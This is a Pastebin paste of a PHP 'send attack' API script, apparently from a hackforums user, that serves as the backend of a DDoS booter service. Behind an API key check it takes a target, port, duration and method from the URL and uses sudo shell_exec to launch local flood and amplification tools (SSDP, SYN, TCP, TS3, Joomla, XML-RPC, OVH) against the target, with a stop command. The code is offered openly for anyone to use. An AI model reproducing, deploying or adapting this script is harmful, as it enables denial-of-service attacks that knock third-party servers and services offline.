Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /**
- * PHP Send Attack Script
- * Free for anyone to use :D
- * By far the most secure script out there kek
- *
- * @author AppleJuice (http://www.hackforums.net/member.php?action=profile&uid=961257)
- */
- header("Content-Type: application/json");
- // enable debugging?
- define("DEBUG", false);
- if (DEBUG) {
- ini_set("display_errors", "On");
- error_reporting(-1);
- } else {
- ini_set("display_errors", "Off");
- error_reporting(0);
- }
- // valid keys
- $validKeys = array(
- "YourKeyHere",
- );
- // allowed attack methods
- $validMethods = array(
- // attack methods
- "SSDP", "DNS", "NTP", "CHARGEN", "TS3",
- "TCP", "SSYN", "ESSYN", "UDP", "OVH",
- "VSE", "ARME", "RUDY", "GET",
- "HEAD", "POST", "JOOMLA", "DOMINATE", "XML-RPC",
- // options
- "stop", "help", "list"
- );
- // default response
- $response = array(
- "success" => false,
- "error" => true,
- );
- // because OCD
- function prettyPrint( $json )
- {
- $result = '';
- $level = 0;
- $in_quotes = false;
- $in_escape = false;
- $ends_line_level = NULL;
- $json_length = strlen( $json );
- for( $i = 0; $i < $json_length; $i++ ) {
- $char = $json[$i];
- $new_line_level = NULL;
- $post = "";
- if( $ends_line_level !== NULL ) {
- $new_line_level = $ends_line_level;
- $ends_line_level = NULL;
- }
- if ( $in_escape ) {
- $in_escape = false;
- } else if( $char === '"' ) {
- $in_quotes = !$in_quotes;
- } else if( ! $in_quotes ) {
- switch( $char ) {
- case '}': case ']':
- $level--;
- $ends_line_level = NULL;
- $new_line_level = $level;
- break;
- case '{': case '[':
- $level++;
- case ',':
- $ends_line_level = $level;
- break;
- case ':':
- $post = " ";
- break;
- case " ": case "\t": case "\n": case "\r":
- $char = "";
- $ends_line_level = $new_line_level;
- $new_line_level = NULL;
- break;
- }
- } else if ( $char === '\\' ) {
- $in_escape = true;
- }
- if( $new_line_level !== NULL ) {
- $result .= "\n".str_repeat( "\t", $new_line_level );
- }
- $result .= $char.$post;
- }
- return $result;
- }
- // check for key, target, port, time and method
- if (isset($_GET['key'], $_GET['target'], $_GET['port'], $_GET['time'], $_GET['method'])) {
- // validate the request info
- if (
- // make sure shit was specified
- !empty($_GET['key']) && !empty($_GET['target']) && !empty($_GET['port']) &&
- !empty($_GET['time']) && !empty($_GET['method']) &&
- // validate types
- is_string($_GET['key']) && is_string($_GET['target']) &&
- is_string($_GET['time']) && is_string($_GET['method']) &&
- ctype_digit($_GET['port']) && ctype_digit($_GET['time']) &&
- // validate target
- (
- filter_var($_GET['target'], FILTER_VALIDATE_IP) ||
- filter_var($_GET['target'], FILTER_VALIDATE_URL)
- ) &&
- // validate time & ports
- (
- $_GET['time'] > 0 && $_GET['time'] < 14400 &&
- $_GET['port'] > 0 && $_GET['port'] < 65535 // max 16-bit # for ports
- )
- ) {
- // check for valid key
- if (in_array($_GET['key'], $validKeys)) {
- // check for valid method
- if (in_array($_GET['method'], $validMethods)) {
- // escape that shit
- $key = escapeshellarg(escapeshellcmd($_GET['key']));
- $target = escapeshellarg(escapeshellcmd($_GET['target']));
- $port = escapeshellarg(escapeshellcmd((int)$_GET['port']));
- $time = escapeshellarg(escapeshellcmd((int)$_GET['time']));
- $proc = hash('crc32', $target);
- // attempt to parse URL
- if (filter_var($_GET['target'], FILTER_VALIDATE_URL)) {
- if (($url = parse_url($_GET['target'])) !== null) {
- $response['error'] = false;
- $target = $url['scheme'] . "://" . $url['host'];
- } else {
- $response['message'] = "Invalid URL";
- }
- } else if (filter_var($_GET['target'], FILTER_VALIDATE_IP)) {
- $response['error'] = false;
- }
- if (DEBUG) {
- // pass request info into response, should be removed later
- $response['request'] = array(
- "target" => $target,
- "port" => $port,
- "time" => $time,
- "method" => $_GET['method'],
- "proc" => $proc,
- );
- }
- if ($response['error'] === false) {
- // attack methods switch
- switch ($_GET['method']) {
- case "SSDP":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ssdp $target $port ssdpamp 4 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "UDP":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./50x $target $port dnsamp 4 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "SSYN":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ssyn $target $port 4 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "ESSYN":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./essyn $target $port 4 -1 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "TCP":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./tcp $target $port 4 -1 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "DOMINATE":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./dominate $target $port 4 -1 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "TS3":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ts3 $target $port ts3amp 4 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "JOOMLA":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./joomla $target joomamp $time 1000");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "XML-RPC":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./xml $target xmlamp $time 1000");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "OVH":
- $response['response'] = shell_exec("sudo screen -d -m -S $proc ./ovh $target $port pvhamp 4 $time");
- $response['message'] = "Attack sent to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- case "stop":
- $response['response'] = shell_exec("sudo pkill -f " . $proc);
- $response['message'] = "Attack stopped to " . $target . ":" . $_GET['port'];
- $response['success'] = true;
- break;
- // method to return valid attack methods
- case "list":
- case "help";
- $response['message'] = "Acceptable attack methods: " . implode(",", $validMethods);
- break;
- // if method is valid but wasn't handled, return an error
- default:
- $response['message'] = "Internal server error. A valid method was requested but could not be handled.";
- break;
- }
- }
- } else {
- $response['message'] = "Invalid attack method";
- }
- } else {
- $response['message'] = "Invalid key";
- }
- } else {
- $response['message'] = "Illegal request";
- }
- } else {
- $response['message'] = "Invalid API request";
- }
- // remove response if we ain't debugging
- if (!DEBUG) {
- unset($response['response']);
- }
- // encode response array to json
- echo prettyPrint(json_encode($response, true));
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement